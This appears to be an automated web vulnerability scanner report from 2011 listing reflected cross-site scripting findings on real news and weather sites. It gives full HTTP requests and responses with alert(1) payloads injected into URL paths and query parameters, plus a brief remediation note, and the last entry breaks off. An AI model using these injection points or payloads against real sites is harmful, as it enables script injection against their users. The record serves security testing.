HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:08:16 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:08:16 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/files?3bcea\"><script>alert(1)</script>d63783f7e5a=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12f7c"><script>alert(1)</script>5e4882fdc7d was submitted in the REST URL parameter 1. This input was echoed as 12f7c\"><script>alert(1)</script>5e4882fdc7d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17b7a"><script>alert(1)</script>df3c8a873d1 was submitted in the REST URL parameter 2. This input was echoed as 17b7a\"><script>alert(1)</script>df3c8a873d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92232"><script>alert(1)</script>8606eb47764 was submitted in the REST URL parameter 3. This input was echoed as 92232\"><script>alert(1)</script>8606eb47764 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 766d1"><script>alert(1)</script>8572d6a55e6 was submitted in the REST URL parameter 1. This input was echoed as 766d1\"><script>alert(1)</script>8572d6a55e6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /766d1"><script>alert(1)</script>8572d6a55e6/plugins/democracy/basic.css HTTP/1.1 Host: mortgage.ocregister.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:01:22 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:01:23 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/766d1\"><script>alert(1)</script>8572d6a55e6/plugins/democracy/basic.cssfeed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1fb8"><script>alert(1)</script>a22401a108a was submitted in the REST URL parameter 1. This input was echoed as e1fb8\"><script>alert(1)</script>a22401a108a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /e1fb8"><script>alert(1)</script>a22401a108a/plugins/democracy/democracy.js HTTP/1.1 Host: mortgage.ocregister.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:01:13 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:01:14 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Length: 62657
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/e1fb8\"><script>alert(1)</script>a22401a108a/plugins/democracy/democracy.jsfeed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf114"><script>alert(1)</script>95836e536ce was submitted in the REST URL parameter 1. This input was echoed as cf114\"><script>alert(1)</script>95836e536ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cf114"><script>alert(1)</script>95836e536ce/plugins/democracy/style.css HTTP/1.1 Host: mortgage.ocregister.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:01:10 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:01:11 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/cf114\"><script>alert(1)</script>95836e536ce/plugins/democracy/style.cssfeed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62930"><script>alert(1)</script>7b7b2ccc4d6 was submitted in the REST URL parameter 1. This input was echoed as 62930\"><script>alert(1)</script>7b7b2ccc4d6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /62930"><script>alert(1)</script>7b7b2ccc4d6/themes/onSet/style.css HTTP/1.1 Host: mortgage.ocregister.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:01:34 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:01:34 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Length: 62650
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/62930\"><script>alert(1)</script>7b7b2ccc4d6/themes/onSet/style.cssfeed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce7f3"><script>alert(1)</script>dcab4cc6610 was submitted in the REST URL parameter 1. This input was echoed as ce7f3\"><script>alert(1)</script>dcab4cc6610 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ce7f3"><script>alert(1)</script>dcab4cc6610/js/swfobject.js?ver=2.2 HTTP/1.1 Host: mortgage.ocregister.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:01:57 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:01:58 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Length: 62650
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/ce7f3\"><script>alert(1)</script>dcab4cc6610/js/swfobject.js?ver=2.2feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f534"><script>alert(1)</script>e883ec4e0ce was submitted in the REST URL parameter 1. This input was echoed as 3f534\"><script>alert(1)</script>e883ec4e0ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /3f534"><script>alert(1)</script>e883ec4e0ce/wlwmanifest.xml HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:07:31 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:07:32 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/3f534\"><script>alert(1)</script>e883ec4e0ce/wlwmanifest.xmlfeed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86904"><script>alert(1)</script>1d2a8825119 was submitted in the REST URL parameter 1. This input was echoed as 86904\"><script>alert(1)</script>1d2a8825119 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xmlrpc.php86904"><script>alert(1)</script>1d2a8825119?rsd HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:07:42 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:07:42 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62658
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/xmlrpc.php86904\"><script>alert(1)</script>1d2a8825119?rsdfeed/" /> ...[SNIP]...
The value of the lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dacc4"%3balert(1)//bc4341ec3d3 was submitted in the lang parameter. This input was echoed as dacc4";alert(1)//bc4341ec3d3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=engdacc4"%3balert(1)//bc4341ec3d3&size=12&theme=clouds&metric=0&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:17:56 GMT Server: PWS/1.7.1.2 X-Px: ms jfk-agg-n11 ( jfk-agg-n32), ms jfk-agg-n32 ( origin>CONN) Cache-Control: max-age=3360 Expires: Thu, 03 Feb 2011 17:13:56 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... Type; return ret; }
The value of the logo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32db1"%3balert(1)//42b70526543 was submitted in the logo parameter. This input was echoed as 32db1";alert(1)//42b70526543 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=132db1"%3balert(1)//42b70526543&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:16:57 GMT Server: PWS/1.7.1.2 X-Px: ms jfk-agg-n11 ( jfk-agg-n38), ms jfk-agg-n38 ( origin>CONN) Cache-Control: max-age=3420 Expires: Thu, 03 Feb 2011 17:13:57 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=132db1";alert(1)//42b70526543&tStyle=normal&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=132db1";ale ...[SNIP]...
The value of the metric request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2096f"%3balert(1)//1ba13126b12 was submitted in the metric parameter. This input was echoed as 2096f";alert(1)//1ba13126b12 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=02096f"%3balert(1)//1ba13126b12&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:19:10 GMT Server: PWS/1.7.1.2 X-Px: ms jfk-agg-n11 ( jfk-agg-n26), ms jfk-agg-n26 ( origin>CONN) Cache-Control: max-age=3300 Expires: Thu, 03 Feb 2011 17:14:10 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... edAttrs["type"] = mimeType; return ret; }
The value of the partner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37e8c"%3balert(1)//8d39e9c745 was submitted in the partner parameter. This input was echoed as 37e8c";alert(1)//8d39e9c745 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather37e8c"%3balert(1)//8d39e9c745&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:16:21 GMT Server: PWS/1.7.1.2 X-Px: ms jfk-agg-n11 ( jfk-agg-n26), ms jfk-agg-n26 ( origin>CONN) Cache-Control: max-age=3060 Expires: Thu, 03 Feb 2011 17:07:21 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3911
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... nversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather37e8c";alert(1)//8d39e9c745&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather37e8c";ale ...[SNIP]...
The value of the tStyle request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2cc6"%3balert(1)//085e153a142 was submitted in the tStyle parameter. This input was echoed as c2cc6";alert(1)//085e153a142 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normalc2cc6"%3balert(1)//085e153a142&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:16:38 GMT Server: PWS/1.7.1.2 X-Px: ms jfk-agg-n11 ( jfk-agg-n28), ms jfk-agg-n28 ( origin>CONN) Cache-Control: max-age=3180 Expires: Thu, 03 Feb 2011 17:09:38 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normalc2cc6";alert(1)//085e153a142&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normalc2cc6";ale ...[SNIP]...
The value of the target request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4df0b"%3balert(1)//aada13118d6 was submitted in the target parameter. This input was echoed as 4df0b";alert(1)//aada13118d6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self4df0b"%3balert(1)//aada13118d6 HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:19:31 GMT Server: PWS/1.7.1.2 X-Px: ms jfk-agg-n11 ( jfk-agg-n8), ms jfk-agg-n8 ( origin>CONN) Cache-Control: max-age=2760 Expires: Thu, 03 Feb 2011 17:05:31 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... "] = mimeType; return ret; }
The value of the theme request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e337d"%3balert(1)//a1ece0aaeff was submitted in the theme parameter. This input was echoed as e337d";alert(1)//a1ece0aaeff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=cloudse337d"%3balert(1)//a1ece0aaeff&metric=0&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:18:53 GMT Server: PWS/1.7.1.2 X-Px: ms jfk-agg-n11 ( jfk-agg-n4), ms jfk-agg-n4 ( origin>CONN) Cache-Control: max-age=3180 Expires: Thu, 03 Feb 2011 17:11:53 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... ) ret.embedAttrs["type"] = mimeType; return ret; }
The value of the zipcode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8162"%3balert(1)//ba94b6bb5ca was submitted in the zipcode parameter. This input was echoed as c8162";alert(1)//ba94b6bb5ca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025c8162"%3balert(1)//ba94b6bb5ca&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
